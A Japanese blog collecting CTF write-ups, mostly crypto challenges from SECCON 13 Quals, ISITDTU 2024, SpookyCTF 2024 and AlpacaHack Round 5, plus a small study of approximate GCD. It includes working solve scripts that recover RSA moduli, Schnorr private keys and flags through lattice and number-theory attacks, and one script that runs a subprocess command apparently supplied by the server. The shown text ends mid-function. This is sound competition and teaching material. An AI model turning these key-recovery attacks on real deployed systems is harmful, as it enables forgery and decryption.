koba-e964の日記

SECCON CTF 13 Quals writeup

SECCON CTF 13 Quals にチーム ZK Lovers で参加した。日本時間で 2024-11-23 14:00 から 2024-11-24 14:00 まで。

結果は 35/653 位。日本のチーム内では 8/303 位だったため、決勝に進出した。

解法集

crypto

xiyi

解説は https://zenn.dev/sigma425/articles/826180135a39cb でやってもらったのでコードだけ。
コードは以下の通り。以下の点が記事とは違うことに注意。

  • 離散対数を取るところで、\log_{-2}(s^yg^r) を計算している。
  • s は s\equiv 1 \pmod{p^2}, s\equiv -2 \pmod{q} を満たす。これによって、 mod p^2 で出る結果が -r に、mod q で出る結果が y-r になる。

presolve.py (パラメーターの算出)

from Crypto.Util.number import isPrime


def order_prim(g: int, p: int, n: int) -> int:
    g = pow(g, (n - 1) // p, n)
    if g == 1:
        return 1
    return p


def order_log(g: int, n: int, prod_list: list[int]):
    ans = 1
    for p in prod_list:
        ans *= order_prim(g, p, n)
    return ans


def main() -> None:
    prod = 1
    prod_list = []

    for i in range(2, 374):
        if not isPrime(i):
            continue
        prod *= i
        prod_list.append(i)

    ps = []
    for i in range(1, 1000000):
        p = prod * i + 1
        if not isPrime(i):
            continue
        if p.bit_length() != 518:
            continue
        if isPrime(p):
            ps.append((p, i))
            if len(ps) == 2:
                break

    for index in range(2):
        p, i = ps[index]
        tmp = prod_list[:]
        tmp.append(i)
        print(f'p{index} = ' + ' * '.join(map(str, tmp)) + ' + 1')
        print(f'prod_list{index} =', tmp)
        print(f'assert p{index}.bit_length() == 518')
        print(f'assert isPrime(p{index})')
        o = order_log(p - 2, p, tmp)
        print(f'o{index} = {o}')

    print('gcd_o = math.gcd(o0, o1)')
    print('assert gcd_o.bit_length() >= 256')
    print('''
gcd_o_factors = []
for p in prod_list0:
    if gcd_o % p == 0:
        gcd_o_factors.append(p)
assert functools.reduce(lambda x, y: x * y, gcd_o_factors) == gcd_o''')

if __name__ == '__main__':
    main()

solve.py

import math
import time
import functools
import json
import sys
from Crypto.Util.number import isPrime
from pwn import remote, process
from params import L


p0 = 2 * 3 * 5 * 7 * 11 * 13 * 17 * 19 * 23 * 29 * 31 * 37 * 41 * 43 * 47 * 53 * 59 * 61 * 67 * 71 * 73 * 79 * 83 * 89 * 97 * 101 * 103 * 107 * 109 * 113 * 127 * 131 * 137 * 139 * 149 * 151 * 157 * 163 * 167 * 173 * 179 * 181 * 191 * 193 * 197 * 199 * 211 * 223 * 227 * 229 * 233 * 239 * 241 * 251 * 257 * 263 * 269 * 271 * 277 * 281 * 283 * 293 * 307 * 311 * 313 * 317 * 331 * 337 * 347 * 349 * 353 * 359 * 367 * 373 * 95111 + 1
prod_list0 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 95111]
assert p0.bit_length() == 518
assert isPrime(p0)
o0 = 36661539024568114673630848676502229358837161250611654971980007790086057602635278619098631925083991929859953297191541221964453055358660192576524314518690
p1 = 2 * 3 * 5 * 7 * 11 * 13 * 17 * 19 * 23 * 29 * 31 * 37 * 41 * 43 * 47 * 53 * 59 * 61 * 67 * 71 * 73 * 79 * 83 * 89 * 97 * 101 * 103 * 107 * 109 * 113 * 127 * 131 * 137 * 139 * 149 * 151 * 157 * 163 * 167 * 173 * 179 * 181 * 191 * 193 * 197 * 199 * 211 * 223 * 227 * 229 * 233 * 239 * 241 * 251 * 257 * 263 * 269 * 271 * 277 * 281 * 283 * 293 * 307 * 311 * 313 * 317 * 331 * 337 * 347 * 349 * 353 * 359 * 367 * 373 * 95471 + 1
prod_list1 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 95471]
assert p1.bit_length() == 518
assert isPrime(p1)
o1 = 433176388095566017443503977303018864439997415658581630574274185147818012525806889798787919014260344688923985302972314688075228224036485629700737413953932390
gcd_o = math.gcd(o0, o1)
assert gcd_o.bit_length() >= 256

gcd_o_factors = []
for p in prod_list0:
    if gcd_o % p == 0:
        gcd_o_factors.append(p)
assert functools.reduce(lambda x, y: x * y, gcd_o_factors) == gcd_o


def crt(a0: int, mo0: int, a1: int, mo1: int) -> int:
    return (a0 * mo1 * pow(mo1, -1, mo0) + a1 * mo0 * pow(mo0, -1, mo1)) % (mo0 * mo1)


def disc_log_prim(g: int, h: int, factor: int, order: int, n: int) -> int | None:
    g = pow(g, order // factor, n)
    h = pow(h, order // factor, n)
    cur = 1
    for i in range(factor):
        if cur == h:
            return i
        cur = cur * g % n
    return None

def disc_log(g: int, h: int, n: int, prod_list: list[int]) -> tuple[int, int]:
    order = functools.reduce(lambda x, y: x * y, prod_list)
    assert pow(g, order, n) == 1
    assert order == gcd_o
    a = 0
    mo = 1
    for factor in prod_list:
        res = disc_log_prim(g, h, factor, order, n)
        assert res is not None, f'{g = }, {h = }, {factor = }, {order = }, {n = }'
        a = crt(a, mo, res, factor)
        mo *= factor
    return (a, mo)


local = len(sys.argv) == 1
io = process(['python3', 'server.py']) if local else remote(sys.argv[1], int(sys.argv[2]))


def main() -> None:
    start = time.time()
    # initialize
    n = p0 * p0 * p1
    x = crt(1, p0 * p0, p1 - 2, p1)
    assert x % (p0 * p0) == 1
    assert x % p1 == p1 - 2
    enc_xs = [x] * L

    # 1: (client) --- n, enc_xs ---> (server)
    io.sendlineafter(b"> ", json.dumps({"n": n, "enc_xs": enc_xs}).encode())

    # 3: (server) --- enc_alphas, beta_sum_mod_n ---> (client)
    params = json.loads(io.recvline().strip().decode())
    enc_alphas = params["enc_alphas"]
    ys = []
    base_0 = -2
    exp_0 = 1
    base_1 = -2
    exp_1 = 1
    for p in prod_list0:
        if p in gcd_o_factors:
            continue
        assert (p0 - 1) % p == 0
        if pow(-2, (p0 - 1) // p, p0) != 1:
            base_0 = pow(base_0, p, p0)
            exp_0 *= p
    base_0 = pow(base_0, p0, p0 * p0)
    exp_0 *= p0
    for p in prod_list1:
        if p in gcd_o_factors:
            continue
        if pow(-2, (p1 - 1) // p, p1) != 1:
            base_1 = pow(base_1, p, p1)
            exp_1 *= p
    assert pow(base_0, gcd_o, p0) == 1
    assert pow(base_0, gcd_o, p0 * p0) == 1
    assert pow(base_1, gcd_o, p1) == 1
    for p in gcd_o_factors:
        assert pow(base_0, gcd_o // p, p0) != 1
        assert pow(base_0, gcd_o // p, p0 * p0) != 1
        assert pow(base_1, gcd_o // p, p1) != 1

    for i in range(L):
        disc_0 = disc_log(base_0, pow(enc_alphas[i], exp_0, p0 * p0), p0 * p0, gcd_o_factors)  # -r
        disc_1 = disc_log(base_1, pow(enc_alphas[i], exp_1, p1), p1, gcd_o_factors) # y - r
        print(f'# ({time.time() - start:.2f}s) {i = }, {disc_0 = }, {disc_1 = }')
        y = (disc_1[0] - disc_0[0]) % gcd_o
        ys.append(y)

    # If, by any chance, you can guess ys, send it for the flag!
    print(f'{ys = }')
    io.sendlineafter(b"> ", json.dumps({"ys": ys, "p": p0, "q": p1}).encode())
    print(io.recvline().strip().decode())  # Congratz! or Wrong...
    print(io.recvline().strip().decode())  # flag or ys


if __name__ == "__main__":
    main()

まとめ

xiyi を解いてギャンブルに大勝ち。

Approximate GCD の返り値の大きさについて、あるいは我々は何個のサンプルを取るべきか

最近の CTF では Approximate GCD を要求されることが多い。直近では 2024/10/26 の CTF (ISITDTU CTF QUALS 2024) で出題された。そのとき出題された Sign という問題において、解く側にはサンプルとなる署名を何個取るかの自由度があり、それによって Approximate GCD に渡す整数の個数が決まる。
Approximate GCD には以下のようなトレードオフがある。

  • 正しさ: 整数の個数が少なすぎると正しい答えが出ない確率が高い。
  • 速度: Approximate GCD は内部で LLL アルゴリズムを使っているので、一応多項式時間で動作はするものの整数の個数が多すぎると時間がかかる。

これにより、Approximate GCD に渡すべき整数の個数が分からなかったので調査した。

実験に使ったコードはコード置き場にある。またデータをまとめたスプレッドシートApproximate GCD の返り値 - Google スプレッドシート にある。

結論

nums を長さ n の s ビット程度の整数列とする。Approximate GCD (approx_gcd.sageapprox_gcd(d: list[int], approx_error: int) -> int) を approx_gcd(nums, 2**b) の形で呼び出す時、返ってくる間違った値は (s-b)/n + b ビット程度である。d ビット程度の値が欲しい場合は、(s-b)/n + b < d となるように十分大きい n を選ぶべきである。(n > (s - b) / (d - b))
Sign の場合、s = 2048 * 11 = 22528, b = 256, d = 2048 であったので、n > (22528 - 256) / (2048-256) ~= 12.43 である必要があった。(実装の都合上、n = (サンプル数) - 1 だったので、(サンプル数) >= 14 が必要。)

前提知識

Approximate GCD というのは、以下のような問題、およびそれを解くアルゴリズムのことを意味している。

n 個の整数 nums が与えられる。nums[i] が全て g の倍数に近いような、最大の g を求めよ。(どの程度の差であれば「近い」とみなすのかは問題によって決まる。)

参考資料はなかなか見つかりにくいが、例えば以下を参考にされたい。

実装は approx_gcd.sage を参考にされたい。

実験

予備実験

筆者はまず、「n 個の整数を approx_gcd に与えるのであれば、失敗確率は 1-1/\zeta(n) で成功確率は 1/\zeta(n) だろう」と考え、実験した。(ζ はゼータ関数であり、なぜゼータ関数が登場するのかは 任意に選んだn数が互いに素になる確率 | Mathlog などを参考にすること。失敗するのは欲しい gcd で割ったときの商がたまたま互いに素でなかったときである。)

結果は予想に反し、n <= 12 のとき (num_sigs <= 13 のとき) 確実に失敗し、n >= 13 のとき (num_sigs >= 14 のとき) 確実に成功した。
データについてはコード置き場の exp-0.sage, exp-0.log を見ること。

誤差の実験 (Sign)

num_sigs <= 13 のとき確実に失敗したので、gcd として得られた値が本来欲しい値と比べてどのくらい大きいかを実験した。
データについてはコード置き場の exp-1-error.sage, exp-1-error.log を見ること。
結果は以下のように、(反比例) + (定数) ビットという形になった。

exp-1-error.sage の結果 (表)
exp-1-error.sage の結果

誤差の実験 (10000 ビットのランダムな整数)

ランダムな整数については (反比例) + (定数) ビットという形になる可能性があると思い、10000 ビットのランダムな整数を num_nums 個与える実験をした。(2 <= num_nums <= 16)
データについてはコード置き場の exp-2.sage, exp-2.log を見ること。

結果はやはり (反比例) + (定数) ビットであった。

exp-2.sage の結果 (表)
exp-2.sage の結果 (グラフ)

結論

nums を長さ n の s ビット程度のランダムな整数列とする。Approximate GCD (approx_gcd.sageapprox_gcd(d: list[int], approx_error: int) -> int) を approx_gcd(nums, 2**b) の形で呼び出す時、返ってくる値は (s-b)/n + b ビット程度である。
この結論は以下の理屈で正当化できる。また実験とも整合している。

  • b が十分に大きい場合、全ての整数を 2^b で割れば nums は 2^(s-b) 程度のランダムな実数列と見なせる。これに対して LLL をやって得られる結果の大きさは s-b のみに依存し、s や b そのものには依存しないはず。そのため最終的なビット長は (s-b の式) + b ビットになるはず。
  • ビット長は n に関して単調減少であるはず。

ISITDTU CTF QUALS 2024 writeup

ISITDTU CTF QUALS 2024 にチーム ZK cha で参加した。日本時間で 2024-10-26 11:00 から 2024-10-27 19:00 まで。

結果は 95/315 位。
SpookyCTF 2024 で散々な目にあったから、SpookyCTF 2024 の競技中にもかかわらずこちらに移行した。

解法集

crypto

ShareMixer1

素数 p が決められる。flag を 1 つ含み他はランダムな係数を持つ、次数 32 の多項式 cs をジャッジが決めるので、長さ 256 以下の数列 xs を送れ。それの各値を代入した結果をシャッフルして返す。」という問題。

xs の中の頻度を調節する (たとえばある数は 1 個だけ入れ、ある数は 2 個入れ、…) と、特定の数を代入した結果が分かる。
これを利用して頻度を [(1, 3), (2, 3), (3, 2), (4, 2), (5, 2), (6, 2), (7, 2), (8, 2), (9, 2), (10, 2), (11, 2), (12, 2), (13, 1), (14, 1), (15, 1), (16, 1), (17, 1), (18, 1)] にすることで、組み合わせを 9216 通り試せば良くなる。
(この列は (頻度, その頻度をもつ数の個数) の列で、同じ頻度をもつ数は全ての順列を試す必要があるので、3! * 3! * 2^10 = 9216 通り)

なお、この問題では PoW を実行することを求められるが、配布されるソースコードにはそれが記載されておらず、リモートサーバーに接続した時に初めて分かる仕様になっていた。

pow.py は以下の通り。

#!/usr/bin/env python3
"""
Copied and modified from https://github.com/balsn/proof-of-work/blob/master/solver/python3.py
"""
import hashlib
import sys


difficulty = 24
zeros = '0' * difficulty


def is_valid(digest):
    if sys.version_info.major == 2:
        digest = [ord(i) for i in digest]
    bits = ''.join(bin(i)[2:].zfill(8) for i in digest)
    return bits[:difficulty] == zeros


def find(prefix: str) -> str:
    i = 0
    while True:
        i += 1
        s = prefix + str(i)
        if is_valid(hashlib.sha256(s.encode()).digest()):
            return str(i)

また solve.sage は以下の通り。

# https://stackoverflow.com/questions/65579133/every-time-i-run-my-script-it-returns-curses-error-must-call-setupterm-firs
import os
os.environ['TERM'] = 'linux'
os.environ['PWNLIB_NOTERM'] = '1'


import sys
import time
import itertools
import pow
from pwn import remote, process
from Crypto.Util.number import long_to_bytes, getPrime


local = len(sys.argv) == 1
io = process(["python3", "chall.py"]) if local else remote(sys.argv[1], int(sys.argv[2]))


l = 32
getPrime(256)


def decouple_multiset(multiset: list[int]) -> dict[int, list[int]]:
    """
    freq -> [val1, val2, ...]
    """
    decoupled_freqs = {}
    for val in multiset:
        if val not in decoupled_freqs:
            decoupled_freqs[val] = 0
        decoupled_freqs[val] += 1
    ret = {}
    for k in decoupled_freqs:
        v = decoupled_freqs[k]
        if v not in ret:
            ret[v] = []
        ret[v].append(k)
    return ret


def solve_lagrange(p: int, assoc: list[tuple[int, int]]) -> list[int]:
    K = GF(p)
    R = PolynomialRing(K, 'x')
    assert len(assoc) == l
    f = R.lagrange_polynomial(assoc)
    return f.list()


def dfs(keys: list[int], start: float, count: list[int], assoc: list[tuple[int, int]], p: int, xs: dict[int, list[int]], shares: dict[int, list[int]]) -> bytes | None:
    count[0] += 1
    if count[0] % 10000 == 0:
        print(f'# ({time.time() - start:.2f}s) count: {count[0]}')
    if len(keys) == 0:
        res = solve_lagrange(p, assoc)
        for v in res:
            bs = long_to_bytes(int(v))
            if bs.startswith(b"ISITDTU{"):
                return bs
        return
    xlist = xs[keys[0]]
    sharelist = shares[keys[0]]
    assert len(xlist) == len(sharelist)
    seq = range(0, len(xlist))
    for perm in itertools.permutations(seq):
        for i, index in enumerate(perm):
            assoc.append((xlist[i], sharelist[index]))
        ret = dfs(keys[1:], start, count, assoc, p, xs, shares)
        if ret is not None:
            return ret
        for _ in seq:
            assoc.pop()
    return None


def share_mixer_decipher(p: int, start: float, xs: dict[int, list[int]], shares: dict[int, list[int]]) -> bytes:
    keys = list(xs)
    count = [0]
    res = dfs(keys, start, count, [], p, xs, shares)
    if res is None:
        raise ValueError("Failed to find the flag")
    return res


def main() -> None:
    start = time.time()
    if not local:
        io.recvuntil(b'Send a suffix that:')
        io.recvline()
        problem = io.recvline().strip().decode()
        prefix = problem.split('"')[1]
        print(f'# ({time.time() - start:.2f}s) {prefix = }')
        suffix = pow.find(prefix)
        print(f'# ({time.time() - start:.2f}s) {suffix = }')
        io.recvuntil(b"Suffix: ")
        io.sendline(suffix.encode())
    io.recvuntil(b"p = ")
    p = int(io.recvline().strip().decode())
    io.recvuntil(b"Gib me the queries: ")
    xs = [1, 2, 3, 4, 4, 5, 5, 6, 6] + sum(([x] * max((x - 1) // 2, 1) for x in range(7, 33)), []) + [28, 29, 30, 30, 31, 31, 32, 32, 32]
    print(f'# {len(xs) = }')
    io.sendline(" ".join(map(str, xs)).encode())
    io.recvuntil(b"shares = ")
    shares = io.recvline().strip().decode()[1:-1].split(", ")
    shares = list(map(int, shares))
    xs = decouple_multiset(xs)
    shares = decouple_multiset(shares)
    print(f'# ({time.time() - start:.2f}s) shares obtained')
    print(f'# length_distrib: {[(v, len(xs[v])) for v in xs]}')
    print(f'# #combinations: {reduce(lambda x, y: x * y, (len(xs[v]) for v in xs))}')
    print(f'# {p = }')
    flag = share_mixer_decipher(p, start, xs, shares)
    print(flag.decode())


if __name__ == "__main__":
    main()
ShareMixer2

素数 p が決められる。flag を 1 つ含み他はランダムな係数を持つ、次数 32 の多項式 cs をジャッジが決めるので、長さ 32 以下の数列 xs を送れ。それの各値を代入した結果をシャッフルして返す。」という問題。
ShareMixer1 に比べて xs の長さ制限が短くなった代わりに、PoW を要求されなくなった。

p-1 が 32 の倍数であれば mod p で 1 の 32 乗根が存在するようになり、さらに xs としてそれらを与えると戻ってきた値の合計が 32 * cs[0] になる。
何回も接続して 1 の 32 乗根が存在するようになるまで (32 | p-1 が成立するまで) 待ち、さらに 1 の 32 乗根を xs として与えて cs[0] を取得して、flag が cs[0] に来るまでガチャを回す。試行回数の期待値は 32 * 32 = 1024 回。

# https://stackoverflow.com/questions/65579133/every-time-i-run-my-script-it-returns-curses-error-must-call-setupterm-firs
import os
os.environ['TERM'] = 'linux'
os.environ['PWNLIB_NOTERM'] = '1'


import sys
import time
from pwn import remote, process, context
from Crypto.Util.number import long_to_bytes


context.log_level = 'error'
local = len(sys.argv) == 1
def get_io():
    return process(["python3", "chall.py"]) if local else remote(sys.argv[1], int(sys.argv[2]))


l = 32


def try_one(start: float) -> None:
    io = get_io()
    while True:
        io.recvuntil(b"p = ")
        p = int(io.recvline().strip().decode())
        if (p - 1) % 32 == 0:
            break
        io.close()
        io = get_io()
    K = GF(p)
    g = K.multiplicative_generator()
    base_l = g ** ((p - 1) // l)
    io.recvuntil(b"Gib me the queries: ")
    xs = [int(base_l ** i) for i in range(l)]
    print(f'# {len(xs) = }')
    io.sendline(" ".join(map(str, xs)).encode())
    io.recvuntil(b"shares = ")
    shares = io.recvline().strip().decode()[1:-1].split(", ")
    shares = list(map(int, shares))
    print(f'# ({time.time() - start:.2f}s) shares obtained')
    io.close()
    cs0 = sum(shares) * pow(l, -1, p) % p
    flag = long_to_bytes(cs0)
    if flag.startswith(b'ISITDTU{'):
        print(flag.decode())
        return flag.decode()


def main() -> None:
    start = time.time()
    count = 0
    while True:
        print(f'# ({time.time() - start:.2f}s) trial {count}')
        res = try_one(start)
        if res is not None:
            print(res)
            return
        count += 1


if __name__ == "__main__":
    main()
Sign

競技終了後に解いた。
「n が未知な状態で PKCS#1 v1.5 形式でランダムなデータの署名を返すオラクルと、フラグに対して pow(flag, d, n) を返すオラクルが与えられる。flag を特定せよ。」という問題。

PKCS#1 v1.5 形式の署名は 0x1ff....ffXXXX (XXXX は対象のハッシュ値など) の形の整数を d 乗したものになることに注意すると、署名の e 乗の差分はほとんど n の倍数 (差は高々 257 ビット整数程度) であることに着目する。
Approximate GCD をやれば良い。

# https://stackoverflow.com/questions/65579133/every-time-i-run-my-script-it-returns-curses-error-must-call-setupterm-firs
import os
os.environ['TERM'] = 'linux'
os.environ['PWNLIB_NOTERM'] = '1'


import sys
import time
from pwn import remote, process
from Crypto.Util.number import long_to_bytes


local = len(sys.argv) == 1
io = process(["python3", "chall.py"]) if local else remote(sys.argv[1], int(sys.argv[2]))


def approx_gcd(d: list[int], approx_error: int) -> int:
    """
    Returns q where d[0] ~= qx and d[i]'s are close to multiples of x.
    The caller must find (d[0] + q // 2) // q if they want to find x.
    """
    l = len(d)
    M = Matrix(ZZ, l, l)
    M[0, 0] = approx_error
    for i in range(1, l):
        M[0, i] = d[i]
        M[i, i] = -d[0]
    L = M.LLL()
    for row in L:
        if row[0] != 0:
            quot = abs(row[0] // approx_error)
            return quot


def get_random_sig() -> int:
    io.recvuntil(b'> ')
    io.sendline(b'1')
    io.recvuntil(b'sig = ')
    return int(io.recvline().strip().decode(), 16)


def get_flag_sig() -> int:
    io.recvuntil(b'> ')
    io.sendline(b'2')
    io.recvuntil(b'sig = ')
    return int(io.recvline().strip().decode(), 16)


def main() -> None:
    start = time.time()
    e = 11
    count = 14
    sigs: list[int] = []
    for _ in range(count):
        sigs.append(get_random_sig())
    print(f'# ({time.time() - start:.2f}s) {sigs[0].bit_length() = }')
    diff = [abs(sigs[i]**e - sigs[i - 1]**e) for i in range(1, count)]
    q = approx_gcd(diff, 2**256)
    n = (diff[0] + q // 2) // q
    print(f'# ({time.time() - start:.2f}s) {n.bit_length() = }')
    print(f'# ({time.time() - start:.2f}s) {hex(pow(sigs[0], e, n)) = }')
    fs = get_flag_sig()
    flag = long_to_bytes(pow(fs, e, n))
    index = flag.find(b'ISITDTU')
    print(flag[index:].decode())


if __name__ == "__main__":
    main()

(2024-11-01 23:36 修正: n を求めるところで四捨五入の代わりに間違えて切り捨てをしてしまっていたので、修正した。)

まとめ

SpookyCTF 2024 よりはマシだったがこれもちょっと不親切なところがあった。

SpookyCTF 2024 writeup

SpookyCTF 2024 にチーム zk-aficionado で参加した。日本時間で 2024-10-26 08:00 から 2024-10-28 08:30 まで。

結果は 122/831 位。
crypto 問題だけ解いた感想としてはかなりワクワクコンテストだった。来年以降の犠牲者を減らすべく解けた問題について書く。
問題で与えられるソースコードや説明が self-contained ではなく、いろいろな推測をする必要があることに注意。

解法集

crypto

the-moth-flies-at-dawn

単語が並べられた wordList.txt と、それらのうちどれか一つのハッシュ値 (アルゴリズム不明) が書かれた hash.txt が与えられるので、どれのハッシュ値か当てる問題。
View Hints をすると「SHA256 を調べろ」(It would be a SHAme if all 256 of these meals went to waste.) と書いてあるので、それによってハッシュアルゴリズムに当たりをつける。

from hashlib import sha256


def main() -> None:
    with open('hash.txt', 'r') as f:
        hash_value = bytes.fromhex(f.read().strip())
    with open('wordList.txt', 'r') as f:
        words = f.read().splitlines()
    for word in words:
        if sha256(word.encode()).digest() == hash_value:
            print(f'NICC{{{word}}}')
            return


if __name__ == '__main__':
    main()
encryption-activated

ciphertext[i] = plaintext[i] - (letter + i) によって暗号化されたデータが与えられるので、letter を推測して復元せよという問題。
単に letter を総当たりしてそれっぽいものを探せば良いが、与えられる flag.output は最後に改行文字があり、それを無視して復元する必要があることに注意。

def mycipher(myinput: str, myletter: str) -> None:
    rawdecrypt = list(myinput)
    for iter in range(0,len(rawdecrypt)):
        rawdecrypt[iter] = chr(ord(rawdecrypt[iter]) + ord(myletter))
        myletter = chr(ord(myletter) + 1)
    if any(c < 0x20 or c > 0x7e for c in map(ord, rawdecrypt)):
        return
    encrypted = "".join(rawdecrypt)
    print("NICC{" + encrypted + "}", myletter)


def main() -> None:
    with open("flag.output", "rb") as f:
        cipher = f.read().strip()
    for c in range(32, 127):
        mycipher(cipher.decode(), chr(c))


if __name__ == "__main__":
    main()
tracking-the-beast

問題文のストーリー部分は完全に無視できて、重要なのは以下の部分だけ。

  • the curve y^2 = x^3 + 73x + 42 mod 251
  • Flag Format: NICC{(##,##)}
  • at (26,38)
    • おそらく基点 (ベースとなる点)
  • A large depiction of Green Lantern with 13 rings on his fingers

これらのことから、点が答えなら与えられた基点のスカラー倍くらいしか方法がないことが推測できるので、(26,38) * 49 = (72,17) が答えである。フラグは NICC{(72,17)} である。

計算には SageMath などを使えば良い。SageMath を使うと以下のように計算できる。

sage: E = EllipticCurve(GF(251), [73, 42])
sage: E
Elliptic Curve defined by y^2 = x^3 + 73*x + 42 over Finite Field of size 251
sage: E(26, 38) * 49
(72 : 17 : 1)

まとめ

crypto じゃなくて guessing を名乗ってくれ

AlpacaHack Round 5 (Crypto) writeup

AlpacaHack Round 5 (Crypto) に参加した。日本時間で 2024-10-12 12:00 から 2024-10-12 18:00 まで。

結果は 9/247 位

解法集

XorshiftStream

(key を hex string にしたもの) + (key と FLAG を xor したもの) を Xorshift で作ったストリームによって暗号化する (XOR)。

前半部分は平文のバイトが [0x30,0x39] または [0x61,0x66] の範囲に収まる。ここから、

  • 第 7 ビットが常に 0
  • 第 5 ビットが常に 1
  • 第 4 ビット xor 第 6 ビットが常に 1

あたりが言えるので、乱数ストリームの該当する位置のビットがわかる。
Xorshift はビットごとに見ると GF(2) の上の線型写像になっているので、1 << 0 から 1 << 63 までの 64 通りの seed によって得られる乱数ストリームのいくつかの xor になっているはず。それを線型代数で求める。

https://doc.sagemath.org/html/ja/tutorial/afterword.html#sagepython
にあるように、xor の記号が ^^ だと知った時かなり嫌な気持ちになった。(時間を無駄にした。)

実装は Sage でやった。

output = bytes.fromhex(open("output.txt").read().strip())
K = GF(2)


class XorshiftStream:
    def __init__(self, key: int):
        self.state = key % 2**64

    def _next(self):
        self.state = (self.state ^^ (self.state << 13)) % 2**64
        self.state = (self.state ^^ (self.state >> 7)) % 2**64
        self.state = (self.state ^^ (self.state << 17)) % 2**64
        return self.state

    def encrypt(self, data: bytes):
        ct = b""
        for i in range(0, len(data), 8):
            pt_block = data[i : i + 8]
            ct += (int.from_bytes(pt_block, "little") ^^ self._next()).to_bytes(
                8, "little"
            )[: len(pt_block)]
        return ct


def next(x: int) -> int:
    x = (x ^ (x << 13))
    x = (x ^ (x >> 7))
    x = (x ^ (x << 17))
    return x


def get_synd(dat: bytes, i: int) -> list[int]:
    u = []
    d = dat[i]
    # 0x3? or 0x6?
    u.append(d >> 7 & 1)
    c3a = d >> 5 & 1
    u.append(c3a ^^ 1)
    u.append((d >> 4 ^^ d >> 6 ^^ 1) & 1)
    return u


def main() -> None:
    keylen = len(output) // 3
    print(f'# {keylen=}')

    # Collect constraints
    units = []
    for h in range(64):
        tmp = XorshiftStream(1 << h)
        dat = tmp.encrypt(b'\x00' * (keylen * 2 + 7))
        u = []
        for i in range(keylen * 2):
            u += get_synd(dat, i)
        units.append(u)
    synd = []
    for i in range(keylen * 2):
        synd += get_synd(output, i)

    # Solve the equation
    A = matrix(K, units)
    b = matrix(K, [synd])
    print(f'# {A=}')
    print(f'# {b=}')
    x = A.solve_left(b)
    print(f'# {x=}')

    # Decrypt the flag
    seed = 0
    for i in range(64):
        seed |= int(x[0, i]) << i
    xss = XorshiftStream(seed)
    decrypted = xss.encrypt(output)
    key = bytes.fromhex(decrypted[:keylen*2].decode())
    flag = [decrypted[keylen*2+i] ^^ key[i] for i in range(keylen)]
    print(bytes(flag).decode())


if __name__ == "__main__":
    main()

NNNN

「n[0] = p * q, n[i] = (p + d[i]) * (q + d[i]) (1 <= i <= 3) が与えられる。ただし p, q は 768 ビットで d[i] は 192 ビット。このとき p, q, d[i] を求めよ。」という問題。

n[i] - n[0] = d[i] * (p + q) + d[i]^2 なので、Approximate GCD を使って p + q を求めれば良い。しかし単純にやると以下のような問題が発生する。

  • p + q が 770 ビットになる (期待される値より 2 倍くらい大きい)
  • Approximate GCD において、どの値を 0 番目として使うかによって p + q の値が異なる

これらの原因を調査したところ、Approximate GCD の値として得られる値が d[i] の 1/2 の値だった。
原因は、d[i] が常に偶数であることと、Approximate GCD が GCD としてなるべく大きい値を得ようとする (その結果戻り値が小さくなる) ことであった。

実装は Sage でやった。

from Crypto.Util.number import long_to_bytes


for line in open('output.txt').readlines():
    exec(line, globals())
ns = [n0, n1, n2, n3]
cs = [c0, c1, c2, c3]


def approx_gcd(d: list[int], approx_error: int) -> int:
    """
    Returns q where d[0] ~= qx and d[i]'s are close to multiples of x.
    The caller must find d[0] // q if they want to find x.
    """
    M = Matrix(ZZ, 3, 4)
    M[0, 0] = approx_error
    M[0, 1] = d[1]
    M[0, 2] = d[2]
    M[1, 1] = -d[0]
    M[2, 2] = -d[0]
    L = M.LLL()
    for row in L:
        if row[0] != 0:
            quot = abs(row[0] // approx_error)
            return quot


def main() -> None:
    # Find p and q
    d = [n1 - n0, n2 - n0, n3 - n0]
    k = 2 ** 400
    quot = approx_gcd(d, k) * 2
    rest = d[0] - quot * quot
    assert rest % quot == 0
    p_plus_q = rest // quot
    print(f'# {p_plus_q = }')
    d = p_plus_q^2 - 4 * n0
    sqrtd = d.sqrt()
    assert sqrtd^2 == d
    p = (p_plus_q + sqrtd) // 2
    q = (p_plus_q - sqrtd) // 2
    assert p * q == n0

    # Decrypt
    factors = []
    for val in ns:
        quot = (val - n0) // p_plus_q
        assert val == n0 + quot * quot + quot * p_plus_q
        factors.append((p + quot, q + quot))
    for i in range(4):
        (pp, qq) = factors[i]
        m = pow(cs[i], pow(65537, -1, (pp - 1) * (qq - 1)), ns[i])
        print(long_to_bytes(m).decode('ascii'), end='')
    print()


if __name__ == "__main__":
    main()

SchnorrLCG

「Schnorr 署名方式で署名と認証を行うサーバーがある。特定のメッセージの署名を偽造して受理せしめよ。」という問題。

x を秘密鍵とする。乱数 k が線形合同法 k[i+1] = a * k[i] + b (mod q) で生成される。このことを利用して、s[i] = k[i] + x * e[i] (mod q) であることから
s_{i+1} - as_i \equiv b + xe_{i+1} - xae_i \pmod q
という関係式ができる。これを LLL で解くことになる。(ECDSA に対する同じような攻撃を参考にする。)

詳細は実装に譲るが、注意点は以下。

  • 最終的に得られるベクトルの各要素が big = 2^1024 程度になるようにする
    • x, a は 384 ビットで xa は 768 ビットであるため、それが現れる位置の大きさが big 程度になるように係数で調整する

実装は Sage でやった。

# https://stackoverflow.com/questions/65579133/every-time-i-run-my-script-it-returns-curses-error-must-call-setupterm-firs
import os
os.environ['TERM'] = 'linux'
os.environ['PWNLIB_NOTERM'] = '1'


import sys
import time
import subprocess
from pwn import process, remote
from Crypto.Hash import SHA256
from Crypto.Util.number import long_to_bytes


local = len(sys.argv) == 1
io = process(["sh", "./run.sh"]) if local else remote(sys.argv[1], int(sys.argv[2]))


def get_hashcash(cmd: str) -> str:
    out = subprocess.check_output(cmd.split()).decode().strip()
    return out


def fetch_sign(msg: bytes) -> tuple[int, int]:
